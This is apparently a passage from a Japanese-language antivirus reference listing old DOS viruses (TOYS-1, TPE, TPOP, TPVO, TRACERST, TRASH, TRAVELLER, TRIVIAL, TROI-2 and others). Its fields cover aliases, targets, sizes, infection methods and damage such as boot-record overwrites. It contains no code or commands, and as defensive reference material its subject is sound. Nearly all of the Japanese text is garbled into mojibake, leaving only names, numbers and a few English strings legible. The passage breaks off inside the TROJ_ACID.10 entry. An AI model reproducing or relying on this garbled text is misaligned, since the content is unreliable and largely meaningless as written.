¼±ÊÌÊýË¡:´¶À÷¥Õ¥¡¥¤¥ë¤Ï263¥Ð¥¤¥ÈÁý²Ã¤¹¤ë¡£

»ÈÍѳä¤ê¹þ¤ßÌ¿Îá:¤Ê¤·

È÷¡¡¡¡¹Í:¥á¥Ç¥£¥¢¤Ê¤É¤Ë¥é¥¤¥È¥×¥í¥Æ¥¯¥È¡Ê½ñ¤­¹þ¤ß¶Ø
»ß½èÍý¡Ë¤¬»Ü¤µ¤ì¤Æ¤¤¤ë¾ì¹ç¡¢ ¥×¥í¥°¥é¥à¼Â¹Ô»þ¤Ë"½ñ¤­¹þ¤ßÉÔ²Ä"¤È¤¤¤¦°ÕÌ£¤Î¥¨¥é¡¼¥á ¥Ã¥»¡¼¥¸¤òɽ¼¨¤¹¤ë¡£

TOYS-1


̾¡¡¡¡¾Î:TOYS-1

ʬ¡¡¡¡Îà:¥Õ¥¡¥¤¥ë´¶À÷·¿

ÂС¡¡¡¾Ý:.COM;.EXE

¥¦¥¤¥ë¥¹¥µ¥¤¥º:773¥Ð¥¤¥È

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:´¶À÷ÊýË¡:
¥«¥ì¥ó¥È¥Ç¥£¥ì¥¯¥È¥êÆâ¤Î̤´¶À÷.COM¥Õ¥¡¥¤¥ë¤òõ¤·½Ð¤· ¤Æ2¤Ä¤º¤Ä´¶À÷¤¹¤ë¡£
Ç˲õ:´¶À÷¡¢Áý¿£°Ê³°¤Î³èư¤Ï¤Ê¤·¡£

È÷¡¡¡¡¹Í:¥á¥Ç¥£¥¢¤Ê¤É¤Ë¥é¥¤¥È¥×¥í¥Æ¥¯¥È¡Ê½ñ¤­¹þ¤ß¶Ø
»ß½èÍý¡Ë¤¬»Ü¤µ¤ì¤Æ¤¤¤ë¾ì¹ç¡¢ ¥×¥í¥°¥é¥à¼Â¹Ô»þ¤Ë"½ñ¤­¹þ¤ßÉÔ²Ä"¤È¤¤¤¦°ÕÌ£¤Î¥¨¥é¡¼¥á ¥Ã¥»¡¼¥¸¤òɽ¼¨¤¹¤ë¡£

TPE(?)


̾¡¡¡¡¾Î:TPE(?)

ÊÌ¡¡¡¡Ì¾:TPE.GAMBIT

ʬ¡¡¡¡Îà:¥Õ¥¡¥¤¥ë´¶À÷·¿

ÂС¡¡¡¾Ý:DOS

¥¦¥¤¥ë¥¹¥µ¥¤¥º:2290 - 2382 bytes

¾Ü¡¡¡¡ºÙ:¡¡
¡¡¥á¥â¥ê¾ïÃó¤ò¹Ô¤¦¥³¥ó¥Ñ¥Ë¥ª¥ó·¿¤Î¥¦¥¤¥ë¥¹¤Ç¤¹¡£¥¦¥¤ ¥ë¥¹¾ïÃó»þ¤Ëµ¯Æ°¤µ¤ì¤¿EXE¥Õ¥¡¥¤¥ë¤ÈƱ¤¸¥Ç¥£¥ì¥¯¥È¥ê¤Ë µ¯Æ°¤µ¤ì¤¿EXE¥Õ¥¡¥¤¥ë¤ÈƱ¤¸¥Õ¥¡¥¤¥ë̾¤Ç³ÈÄ¥»Ò¤¬COM¤Î ¥Õ¥¡¥¤¥ë¤òºî¤ê¡¢¼«Ê¬¤ò¥³¥Ô¡¼¤·¤Þ¤¹¡£DOS¤Ç¤Ï¥³¥Þ¥ó¥É¤ò ÆþÎϤ·¤¿¾ì¹ç¡¢COM¥Õ¥¡¥¤¥ë¤ÎÊý¤¬Àè¤Ë¼Â¹Ô¤µ¤ì¤ë¤Î¤Ç¤½¤ì °Ê¹ß¡¢»ÈÍѤ·¤¿¥³¥Þ¥ó¥É¤¬¥¦¥¤¥ë¥¹¤ËÃÖ¤­´¹¤ï¤Ã¤Æ¤·¤Þ¤¤ ¤Þ¤¹¡£ ¡¡°­¼Á¤ÊÇ˲õ³èư¤Ï¹Ô¤¤¤Þ¤»¤ó¤¬¡¢»ÈÍѤ¹¤ëEXE¥Õ¥¡¥¤¥ë¤¬ ¤¹¤Ù¤Æ¥¦¥¤¥ë¥¹¤ËÃÖ¤­´¹¤¨¤é¤ì¤Æ¤¤¤Ã¤Æ¤·¤Þ¤¦¤Î¤Ç¥³¥Þ¥ó ¥É¤¬¼Â¹Ô¤Ç¤­¤Ê¤¯¤Ê¤ê¤Þ¤¹¡£
È÷¡¡¡¡¹Í:¡¡
¡¡£±¸Ä¤Î¥×¥í¥°¥é¥à¤Ê¤Î¤Ç¶î½ü¤Ï¤Ç¤­¤Þ¤»¤ó¡£È¯¸«¤·¤¿¾ì ¹ç¤Ï¥Õ¥¡¥¤¥ë¤´¤Èºï½ü¤·¤Æ¤¯¤À¤µ¤¤¡£

TPOP


̾¡¡¡¡¾Î:TPOP

ÊÌ¡¡¡¡Ì¾:TARGET_POPPY.532ޤ VICOD.532ޤ TPOP532ޤ POPPY

-535ʬ¡¡¡¡Îà:¥Õ¥¡¥¤¥ë´¶À÷·¿

ÂС¡¡¡¾Ý:.COM

¥¦¥¤¥ë¥¹¥µ¥¤¥º:532¥Ð¥¤¥È

ȯ¾ÍÃÏ:ÊÆ¹ñ

ȯ¸«Æü:1997/07

¾Ü¡¡¡¡ºÙ:´¶À÷ÊýË¡:
¡Ý¡¡´¶À÷¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤·¤¿¤È¤­Ž¤¥á¥â¥ê¤Ë¾ïÃ󤷤Ƥ¤¤Ê¤± ¤ì¤Ð¥á¥â¥ê¾å°Ì¤Ë¾ïÃ󤹤뎡 ¡Ý¡¡¥á¥â¥ê¾ïÃó¸åŽ¤Ì¤´¶À÷¥Õ¥¡¥¤¥ë¤Ë¥¢¥¯¥»¥¹¤¹¤ëޤ¤Þ¤¿¤Ï ¼Â¹Ô¤¹¤ëÅ٤ˎ¤¤½¤Î¥Õ¥¡¥¤¥ë¤ÎºÇ¸å¤Ë¥¦¥¤¥ë¥¹¥³¡¼¥É¤òÉÕ¤± ²Ã¤¨¤Æ´¶À÷¤·¤Æ¤¤¤¯Ž¡
»³²:
-¡¡¥¦¥¤¥ë¥¹¤Ï´¶À÷¤·¤¿¥Õ¥¡¥¤¥ë¤Î¿ô¤ò¥«¥¦¥ó¥È¤·Ž¤´¶À÷¿ô ¤¬¤¢¤ë¿ô¤Ë㤹¤ë¤È¥Þ¥·¥ó¤ò¥Ï¥ó¥°¥¢¥Ã¥×¤µ¤»¤ëŽ¡¤³¤Î¥È¥ê ¥¬¡¼¤È¤Ê¤ë´¶À÷¿ô¤Ïޤ¥é¥ó¥À¥à¤Ë·èÄꤵ¤ì¤ë¤¿¤áͽ¬¤ÏÉÔ ²Äǽ¤Ç¤¢¤ëŽ¡
È÷¡¡¡¡¹Í:¡Ý¡¡¥¦¥¤¥ë¥¹¥³¡¼¥ÉÆâ¤Ë°Ê²¼¤Îʸ»úÎó¤ò´Þ¤ó¤Ç

¤¤¤ë:
¡ÈLife is hard when your target is the poppy J "

TPVO


̾¡¡¡¡¾Î:TPVO

ʬ¡¡¡¡Îà:Ê£¹ç´¶À÷·¿

ÂС¡¡¡¾Ý:FD:¥Ö¡¼¥È¥»¥¯¥¿;HD:¥Þ¥¹¥¿¡¼¥Ö¡¼¥È¥ì¥³¡¼¥É;.
COM;.EXE
¥¦¥¤¥ë¥¹¥µ¥¤¥º:ÉÔÌÀ

ȯ¾ÍÃÏ:ÂæÏÑ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:´¶À÷ÊýË¡:
£±¡Ë´¶À÷£Æ£Ä¤¬¥Þ¥·¥ó¤Îµ¯Æ°»þ¤Ë£Æ£Ä£Ä¤ËÆþ¤Ã¤Æ¤¤¤¿¾ì ¹ç¡¢¤Þ¤¿¤Ï´¶À÷¥Õ¥¡¥¤¥ë¤¬¼Â¹Ô¤µ¤ì¤ë¤È¥¦¥¤¥ë¥¹¤¬¥á¥â¥ê ¤Ë¾ïÃó¤·¡¢¥Þ¥¹¥¿¡¼¥Ö¡¼¥È¥ì¥³¡¼¥É¤¬´¶À÷¤¹¤ë¡£ £²¡Ë¥¦¥¤¥ë¥¹¤Î¥á¥â¥ê¾ïÃó¸å¤Ë¼Â¹Ô¡¢¤â¤·¤¯¤Ï¥³¥Ô¡¼¤µ¤ì ¤¿¥Õ¥¡¥¤¥ë¤Ë´¶À÷¤¹¤ë¡£ £³¡Ë¥¦¥¤¥ë¥¹¤Î¥á¥â¥ê¾ïÃó¸å¤Ë¥¢¥¯¥»¥¹¤µ¤ì¤¿£Æ£Ä¤Î¥Ö ¡¼¥È¥»¥¯¥¿¡¼¤Ë´¶À÷¤¹¤ë¡£
È÷¡¡¡¡¹Í:

TPVO.3783.E


̾¡¡¡¡¾Î:TPVO.3783.E

ÊÌ¡¡¡¡Ì¾:COMPBACK.3783ޤ TPVO.3783.A

ʬ¡¡¡¡Îà:Ê£¹ç´¶À÷·¿

ÂС¡¡¡¾Ý:ŽÏ޽ŽÀްŽÌŽÞްŽÄŽÚŽºŽ°ŽÄŽÞ;.COM;.EXE

¥¦¥¤¥ë¥¹¥µ¥¤¥º:3ޤ783 bytes

ȯ¾ÍÃÏ:ÂæÏÑ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:-´¶À÷ÊýË¡:
£±¡Ë´¶À÷£Æ£Ä¤¬¥Þ¥·¥ó¤Îµ¯Æ°»þ¤Ë£Æ£Ä£Ä¤ËÆþ¤Ã¤Æ¤¤¤¿¾ì ¹ç¡¢¤Þ¤¿¤Ï´¶À÷¥Õ¥¡¥¤¥ë¤¬¼Â¹Ô¤µ¤ì¤ë¤È¥¦¥¤¥ë¥¹¤¬¥á¥â¥ê ¤Ë¾ïÃó¤·¡¢¥Þ¥¹¥¿¡¼¥Ö¡¼¥È¥ì¥³¡¼¥É¤¬´¶À÷¤¹¤ë¡£ £²¡Ë¥¦¥¤¥ë¥¹¤Î¥á¥â¥ê¾ïÃó¤·¤¿¸åޤ¥³¥Þ¥ó¥É¥é¥¤¥ó¾å¤Ç¼Â¹Ô ¤µ¤ì¤¿¥Õ¥¡¥¤¥ë¤Ë´¶À÷¤¹¤ë¡£ £³¡Ë¥¦¥¤¥ë¥¹¤Î¥á¥â¥ê¾ïÃó¸å¤Ë¥¢¥¯¥»¥¹¤µ¤ì¤¿£Æ£Ä¤Î¥Ö ¡¼¥È¥»¥¯¥¿¡¼¤Ë´¶À÷¤¹¤ë¡£
È÷¡¡¡¡¹Í:¤³¤Î¥¦¥¤¥ë¥¹¤Ï¥¹¥Æ¥ë¥¹·¿¤ÎÆÃÀ­¤ò»ý¤Áޤ¼«¿È¤Î
¥¦¥¤¥ë¥¹¥³¡¼¥É¤ò°Å¹æ²½¤¹¤ëŽ¡¤è¤Ã¤Æ¥á¥â¥ê¡¼¤Ë¥í¡¼¥É¤µ¤ì ¤¿¸å¤Çޤ¥á¥â¥êÃæ¤Ë¥¦¥¤¥ë¥¹¤òȯ¸«¤¹¤ë¤Î¤Ïº¤Æñ¤Ç¤¢¤ëŽ¡

TRACERST


̾¡¡¡¡¾Î:TRACERST

ÊÌ¡¡¡¡Ì¾:Vsign.A, Vsign.B, Vsign Family

ʬ¡¡¡¡Îà:¥·¥¹¥Æ¥àÎΰ贶À÷·¿Ž¤¥á¥â¥ê¾ïÃó·¿Ž¤¥Ý¥ê¥â¥Õ¥£
¥Ã¥¯·¿
¥¦¥¤¥ë¥¹¥µ¥¤¥º:Ìó40¥Ð¥¤¥È

¾Ü¡¡¡¡ºÙ:ñ½ã¤Ê¥·¥¹¥Æ¥àÎΰ贶À÷·¿¥¦¥¤¥ë¥¹¤Ç¤¢¤ê¡¢¥Õ
¥í¥Ã¥Ô¡¼¥Ç¥£¥¹¥¯¤Î¥Ö¡¼¥È¥»¥¯¥¿¡¼¡¢¤ª¤è¤Ó¡¢¥Ï¡¼¥É¥Ç¥£ ¥¹¥¯¤ÎMBR¡Ê¥á¥â¥ê¡¦¥Ð¥Ã¥Õ¥¡¡¦¥ì¥¸¥¹¥¿¡¼¡Ë¤Ë´¶À÷¤¹¤ë¡£ ¤Þ¤¿Ž¤¥Ý¥ê¥â¥Õ¥£¥¯¥¹·¿¥¦¥¤¥ë¥¹¤Ç¤¢¤ê¡¢´¶À÷¤´¤È¤Ë¥³¡¼¥É ¤òÊѹ¹¤·¤ÆÈ¯¸«¤µ¤ì¤Å¤é¤¯¤¹¤ë¡£
»³²:
´¶À÷¸å64²óÌܤε¯Æ°»þ¤Ë¡¢Â礭¤Ê¡ÉV¡É¥µ¥¤¥ó¤ò¥¹¥¯¥ê¡¼¥ó ¤Ëɽ¼¨¤¹¤ë¡£°¡¼ï¤Î¤Ê¤«¤Ë¤Ï¡¢16²óÌܤˡ¢¡ÉVERONIKA¡É¤È ɽ¼¨¤¹¤ë¤â¤Î¤â¤¢¤ë¡£ ¤Þ¤¿Ž¤È¯É¾õ¶·»þ¤Ë¥³¥ó¥Ô¥å¡¼¥¿¤¬Ää»ß¤¹¤ë¡£
È÷¡¡¡¡¹Í:¤Û¤«¤Î¥Ö¡¼¥È¥»¥¯¥¿¡¼·¿¥¦¥¤¥ë¥¹Æ±ÍÍ¡¢¥·¥¹¥Æ
¥à¤Ø¤Î³ä¤ê¹þ¤ßÍ×µá¤ò¹Ô¤Ê¤¦¡£ ¤³¤Î¥¦¥¤¥ë¥¹¤Ë¤ÏÆÃÊ̤ʵ¡Ç½¤¬¤¢¤ê¡¢Æ±¤¸¥Ö¡¼¥È¥»¥¯¥¿ ¡¼·¿¤Ç¤¢¤ëStoned¤ª¤è¤ÓMarijuana¥¦¥¤¥ë¥¹¤¬¥·¥¹¥Æ¥à¤Ë´¶ À÷¤·¤Æ¤¤¤ë¤È¡¢¼«Ê¬¤Î¥³¡¼¥É¤ò½ñ¤­¹þ¤ó¤Ç´¶À÷¤¹¤ë¤Þ¤¨ ¤Ë¡¢¤½¤ì¤é¤Î¥¦¥¤¥ë¥¹¤ò¥·¥¹¥Æ¥à¤«¤é¾Ãµî¤¹¤ë¡£

TRAKIA.653


̾¡¡¡¡¾Î:TRAKIA.653

ÊÌ¡¡¡¡Ì¾:TRA-653.EXE

ʬ¡¡¡¡Îà:¥Õ¥¡¥¤¥ë´¶À÷·¿

ÂС¡¡¡¾Ý:.EXE(DOSÍÑ16bit¼Â¹Ô¥Õ¥¡¥¤¥ë)

¥¦¥¤¥ë¥¹¥µ¥¤¥º:N/A

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:´¶À÷ÊýË¡:
-¡¡´¶À÷¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤¹¤ë¤Èޤ¥á¥â¥ê¤Ë¾ïÃ󤹤뎡£¹£´£´¥Ð ¥¤¥È¤Î¥á¥â¥ê¤ò»ÈÍѤ·¡¢¾ïÃ󤹤롣¾ïÃó¤·¤¿¤é¡¢¼Â¹Ô¤µ¤ì ¤¿£Å£Ø£Å¥Õ¥¡¥¤¥ë¤Ë´¶À÷¤¹¤ë¡£ -¡¡´¶À÷¤µ¤ì¤¿¥Õ¥¡¥¤¥ë¤Ï¥µ¥¤¥º¤¬656¥Ð¥¤¥È¤«¡¢661¥Ð¥¤¥È ¤Þ¤¿¤Ï669¥Ð¥¤¥ÈÁý¤¨¤ë¡£
»³²:
-¡¡¥¦¥¤¥ë¥¹¥³¡¼¥É¤ò¥³¥Ô¡¼¤¹¤ë¤À¤±¤ÇÆÃ¤ËÇ˲õ³èư̵¤·Ž¡
¾É¾õ:
¡¡¡¡-¡¡¥á¥â¥ê¤¬£¹£´£´¥Ð¥¤¥È¾¯¤Ê¤¯¤Ê¤ë¡£ -¡¡´¶À÷¥Õ¥¡¥¤¥ë¤Ï¥µ¥¤¥º¤¬656ޤ 661ޤ 669¥Ð¥¤¥ÈÁý¤¨¤ë
È÷¡¡¡¡¹Í:

TRASH


̾¡¡¡¡¾Î:TRASH

ʬ¡¡¡¡Îà:¥Õ¥¡¥¤¥ë´¶À÷·¿

¥¦¥¤¥ë¥¹¥µ¥¤¥º:N/A

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:¼±ÊÌÊýË¡:
¤³¤Î¥¦¥¤¥ë¥¹¤Ï¥Õ¥¡¥¤¥ë¤Ë¤Ï´¶À÷¤·¤Ê¤¤¡£ ¡Ý¼¡¤Î¤è¤¦¤Ê¥á¥Ã¥»¡¼¥¸¤òɽ¼¨¤¹¤ë¡£ "Warning!!! This program will zero (DESTROY¡Ëthe master boot record ofyour first hard disk. The purpose of this is to test the antivirus softwareޤ so be sure you have installed your favorite protecting program beforerunning this one! It's almost certain that it will fail to protect youanyway. Press any key to abortޤ or press Ctrl-Alt-Right Shift- F5 to proceedat your own risk." ¡ÝŽ¢CtrlŽ£+Ž¢ALTŽ£+±¦[Shift]+[F5]¤òƱ»þ¤Ë²¡¤¹¤È¥Ñ¡¼¥Æ¥£¥· ¥ç¥ó¥Æ¡¼¥Ö¥ë¤ò¾å½ñ¤­¤¹¤ë¡£
Ç˲õ:¥Ñ¡¼¥Æ¥£¥·¥ç¥ó¥Æ¡¼¥Ö¥ë¤ò¾å½ñ¤­¤¹¤ë¡£

È÷¡¡¡¡¹Í:

TRAVELLER


̾¡¡¡¡¾Î:TRAVELLER

ÊÌ¡¡¡¡Ì¾:BUPT

ʬ¡¡¡¡Îà:¥Õ¥¡¥¤¥ë´¶À÷·¿

ÂС¡¡¡¾Ý:.COM¡¢.EXE

¥¦¥¤¥ë¥¹¥µ¥¤¥º:1ޤ220¡Á1ޤ237¥Ð¥¤¥È

¾Ü¡¡¡¡ºÙ:COMMAND.COM¤Ê¤É.COM¡¢.EXE¥Õ¥¡¥¤¥ë¤Ë´¶À÷¤·¤Þ
¤¹¡£ ´¶À÷¥Õ¥¡¥¤¥ë¤¬¼Â¹Ô¤µ¤ì¤ë¤È¡¢¥á¥â¥ê¤Ë¾ïÃó¤·¤Þ¤¹¡£ÍøÍÑ ²Äǽ¥á¥â¥ê¤¬1ޤ840¥Ð¥¤¥È¸º¾¯¤·¤Þ¤¹¡£¥á¥â¥ê¤Ë¾ïÃó¤¹¤ë ¤È.COM¡¢.EXE¥Õ¥¡¥¤¥ë¤Î¼Â¹Ô»þ¤Ë´¶À÷¤·¤Þ ¤¹¡£¤Þ¤¿¡¢DIR¥³¥Þ¥ó¥É¤Ë¤â´¶À÷¤·¤Þ¤¹¡£´¶À÷¤¹¤ë¤È¥µ¥¤¥º ¤¬1ޤ220¡Á1ޤ237¥Ð¥¤¥Èʬ¥Õ¥¡¥¤¥ë¤ÎºÇ¸å¤ËÁý²Ã¤·¤Þ¤¹¡£ ¡¡¡¡ ¡¡¡¡¥¦¥¤¥ë¥¹Æâ¤Ë°Ê²¼¤Îʸ»úÎó¤¬Â¸ºß¤·¤Þ¤¹¡£ ¡¡¡¡ ¡¡¡¡"Traveller (C) BUPT 1991.4" ¡¡¡¡"Don't panic I'm harmless <<---!!!!!!!" ¡¡¡¡"*.* COMEXE"
È÷¡¡¡¡¹Í:

TRIDENT


̾¡¡¡¡¾Î:TRIDENT

ʬ¡¡¡¡Îà:¥Õ¥¡¥¤¥ë´¶À÷·¿

ÂС¡¡¡¾Ý:.COM;.EXE

¥¦¥¤¥ë¥¹¥µ¥¤¥º:2385¡Á2395¥Ð¥¤¥Èȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:´¶À÷ÊýË¡:
¥á¥â¥ê¤Ë¾ïÃ󤷤Ƥ¤¤Ê¤±¤ì¤Ð¡¢¾å°Ì¥á¥â¥ê¤Ë¾ïÃ󤹤롣 ¾ïÃó¸å¡¢¥ª¥ê¥¸¥Ê¥ë¥ë¡¼¥Á¥ó¤ËÌá¤ë¡£ ̤´¶À÷¤Î.COM¤Þ¤¿¤Ï.EXE¥Õ¥¡¥¤¥ë¤òDIR¥³¥Þ¥ó¥É¤Ç¥¢¥¯¥»¥¹ ¤¹¤ëÅ٤˴¶À÷¤¹¤ë¡£
»ÈÍѳä¤ê¹þ¤ßÌ¿Îá:INT 21H¡¢INT 24h

Ç˲õ:´¶À÷¡¢Áý¿£°Ê³°¤Î³èư¤Ï¤Ê¤·¡£

¼±ÊÌÊýË¡:´¶À÷¥Õ¥¡¥¤¥ë¤Ï2385¡Á2395¥Ð¥¤¥ÈÁý²Ã¤¹¤ë¡£

È÷¡¡¡¡¹Í:

TRIPLE_SHOT


̾¡¡¡¡¾Î:TRIPLE_SHOT

ʬ¡¡¡¡Îà:¥Õ¥¡¥¤¥ë´¶À÷·¿

ÂС¡¡¡¾Ý:.EXE

¥¦¥¤¥ë¥¹¥µ¥¤¥º:6610¥Ð¥¤¥È

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:´¶À÷ÊýË¡:
¥«¥ì¥ó¥È¥Ç¥£¥ì¥¯¥È¥êÆâ¤Î̤´¶À÷.EXE¥Õ¥¡¥¤¥ë¤òõ¤·½Ð ¤¹¡£ ¤½¤Î¥Õ¥¡¥¤¥ë¤ÈƱ̾¤Ç¡¢6610¥Ð¥¤¥È¥µ¥¤¥º¤ÎÉԲĻë°À­¤Î. COM¥Õ¥¡¥¤¥ë¤òºîÀ®¤¹¤ë¡£
Ç˲õ:´¶À÷¡¢Áý¿£°Ê³°¤Î³èư¤Ï¤Ê¤·¡£

È÷¡¡¡¡¹Í:¥á¥Ç¥£¥¢¤Ê¤É¤Ë¥é¥¤¥È¥×¥í¥Æ¥¯¥È¡Ê½ñ¤­¹þ¤ß¶Ø
»ß½èÍý¡Ë¤¬»Ü¤µ¤ì¤Æ¤¤¤ë¾ì¹ç¡¢ ¥×¥í¥°¥é¥à¼Â¹Ô»þ¤Ë"½ñ¤­¹þ¤ßÉÔ²Ä"¤È¤¤¤¦°ÕÌ£¤Î¥¨¥é¡¼¥á ¥Ã¥»¡¼¥¸¤òɽ¼¨¤¹¤ë¡£

TRIVIAL


̾¡¡¡¡¾Î:TRIVIAL

ÊÌ¡¡¡¡Ì¾:MINIMALޤ MINI-45

ʬ¡¡¡¡Îà:¥Õ¥¡¥¤¥ë´¶À÷·¿

ÂС¡¡¡¾Ý:.COM

¥¦¥¤¥ë¥¹¥µ¥¤¥º:45¥Ð¥¤¥È

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:´¶À÷ÊýË¡:
´¶À÷¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤¹¤ë¤È¡¢Æ±¤¸¥Ç¥£¥ì¥¯¥È¥êÆâ¤Ë¤¢¤ëÁ´ ¤Æ¤Î.COM¥Õ¥¡¥¤¥ë¤Ë´¶À÷¤¹¤ë¡£ ¥¦¥¤¥ë¥¹¤Ï´¶À÷¥Õ¥¡¥¤¥ë¤ÎÀèÆ¬45¥Ð¥¤¥È¤ò¾å½ñ¤­¤¹¤ë¡£ ´¶À÷¥Õ¥¡¥¤¥ë¤ÎÆüÉÕµÚ¤Ó»þ¹ï¾ðÊó¤Ï¡¢´¶À÷»þ¤Î¤â¤Î¤Ë¹¹¿· ¤µ¤ì¤ë¡£
Ç˲õ:´¶À÷¥Õ¥¡¥¤¥ë¤Ï´°Á´¤ËÇ˲õ¤µ¤ì¤ë¡£

È÷¡¡¡¡¹Í:

TRIVIAL_32.M


̾¡¡¡¡¾Î:TRIVIAL_32.M

ʬ¡¡¡¡Îà:¥Õ¥¡¥¤¥ë´¶À÷·¿

ÂС¡¡¡¾Ý:.COM

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:´¶À÷ÊýË¡:
´¶À÷¥Õ¥¡¥¤¥ë¤ò¼Â¹Ô¤¹¤ë¤È¡¢Æ±¤¸¥Ç¥£¥ì¥¯¥È¥êÆâ¤Ë¤¢¤ëÁ´ ¤Æ¤Î.COM¥Õ¥¡¥¤¥ë¤Ë´¶À÷¤¹¤ë¡£ ´¶À÷¥Õ¥¡¥¤¥ë¤ÎÆüÉÕµÚ¤Ó»þ¹ï¾ðÊó¤Ï¡¢´¶À÷»þ¤Î¤â¤Î¤Ë¹¹¿· ¤µ¤ì¤ë¡£
Ç˲õ:´¶À÷¥Õ¥¡¥¤¥ë¤Ï¾å½ñ¤­¤µ¤ì¤ë¤¿¤áÀµ¾ï¤Ë¼Â¹Ô¤Ç¤­¤Ê
¤¯¤Ê¤ëŽ¡
È÷¡¡¡¡¹Í:

TRKSWAP


̾¡¡¡¡¾Î:TRKSWAP

ʬ¡¡¡¡Îà:¥·¥¹¥Æ¥àÎΰ贶À÷·¿

ÂС¡¡¡¾Ý:FD:¥Ö¡¼¥È¥»¥¯¥¿;HD:¥Þ¥¹¥¿¡¼¥Ö¡¼¥È¥ì¥³¡¼¥É

¥¦¥¤¥ë¥¹¥µ¥¤¥º:N/A

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:´¶À÷ÊýË¡:
£±¡Ë¤³¤Î¥¦¥¤¥ë¥¹¤Ë´¶À÷¤·¤¿¥Õ¥í¥Ã¥Ô¡¼¥Ç¥£¥¹¥¯¤Ç¥Þ¥·¥ó ¤Îµ¯Æ°Æ°ºî¤ò¹Ô¤¦¤È ¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤Î¥·¥¹¥Æ¥àÎΰè¡Ê¥Þ¥¹¥¿¡¼¥Ö¡¼¥È¥ì¥³ ¡¼¥É¡Ë¤Ë´¶À÷¤¹¤ë¡£ £²¡Ë¤³¤Î¥¦¥¤¥ë¥¹¤Ë´¶À÷¤·¤¿¥Ï¡¼¥É¥Ç¥£¥¹¥¯¤Ç¥Þ¥·¥ó¤òµ¯ ư¤¹¤ë¤È¡¢ ¥á¥â¥ê¡¼¤Ë¾ïÃ󤷤ƥե¡¥¤¥ë¤ÎÆþ½ÐÎϤò´Æ»ë¤¹¤ë¡£ £³¡Ë¤½¤Î¸å¡¢½ñ¤­¹þ¤ß²Äǽ¤Ê¥Õ¥í¥Ã¥Ô¡¼¥Ç¥£¥¹¥¯¤Ë¥¢¥¯¥» ¥¹¤¹¤ë¤È¡¢¤½¤Î¥Ç¥£¥¹¥¯¤Î¥Ö¡¼¥È¥»¥¯¥¿¤Ë´¶À÷¤¹¤ë¡£ ¡Ý¤½¤Î¾¡¢ÆÃ¤Ë¥¦¥¤¥ë¥¹¼«¿È¤Ë¤è¤ëÇ˲õ³èư¤Ï¤Ê¤¤¤â¤Î¤È »×¤ï¤ì¤ë¡£
È÷¡¡¡¡¹Í:

TROI-2


̾¡¡¡¡¾Î:TROI-2

ʬ¡¡¡¡Îà:¥Õ¥¡¥¤¥ë´¶À÷·¿

ÂС¡¡¡¾Ý:.EXE

¥¦¥¤¥ë¥¹¥µ¥¤¥º:512¥Ð¥¤¥È

ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:ÉÔÌÀ

¾Ü¡¡¡¡ºÙ:´¶À÷ÊýË¡:
¥·¥¹¥Æ¥à¤ÎÆüÉÕ¤¬1992ǯ5·î1Æü°ÊÁ°¤Ê¤é¤Ð¤½¤Î¤Þ¤Þ¥ª¥ê¥¸ ¥Ê¥ë¥ë¡¼¥Á¥ó¤ËÌá¤ë¡£ ¤½¤ì°Ê³°¤ÎÆü¤Ç¤¢¤ì¤Ð¥á¥â¥ê¤Ë¾ïÃ󤷤Ƥ¤¤ë¤«¥Á¥§¥Ã¥¯¤¹ ¤ë¡£ ¾ïÃ󤷤Ƥ¤¤Ê¤±¤ì¤Ð¾ïÃó¤·¡¢¤½¤Î¸å¥ª¥ê¥¸¥Ê¥ë¥ë¡¼¥Á¥ó¤Ë Ìá¤ë¡£ ̤´¶À÷¤Î.EXE¥Õ¥¡¥¤¥ë¤¬¼Â¹Ô¤µ¤ì¤ëÅ٤˴¶À÷¤¹¤ë¡£
»ÈÍѳä¤ê¹þ¤ßÌ¿Îá:INT 21h

Ç˲õ:´¶À÷¡¢Áý¿£°Ê³°¤Î³èư¤Ï¤Ê¤·¡£

È÷¡¡¡¡¹Í:´¶À÷¥Õ¥¡¥¤¥ë¤ÎÆüÉդȻþ¹ï¤ÏÊѹ¹¤µ¤ì¤Ê¤¤¡£

TROJ_ACID.10


̾¡¡¡¡¾Î:TROJ_ACID.10

ÊÌ¡¡¡¡Ì¾:ACID.10, ACID BATTERY

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿¡Ê¥Ï¥Ã¥­¥ó¥°¥Ä¡¼¥ë¡Ë

ÂС¡¡¡¾Ý:Win9x

¥¦¥¤¥ë¥¹¥µ¥¤¥º:¾ÜºÙ»²¾È

¾Ü¡¡¡¡ºÙ:-¡¡
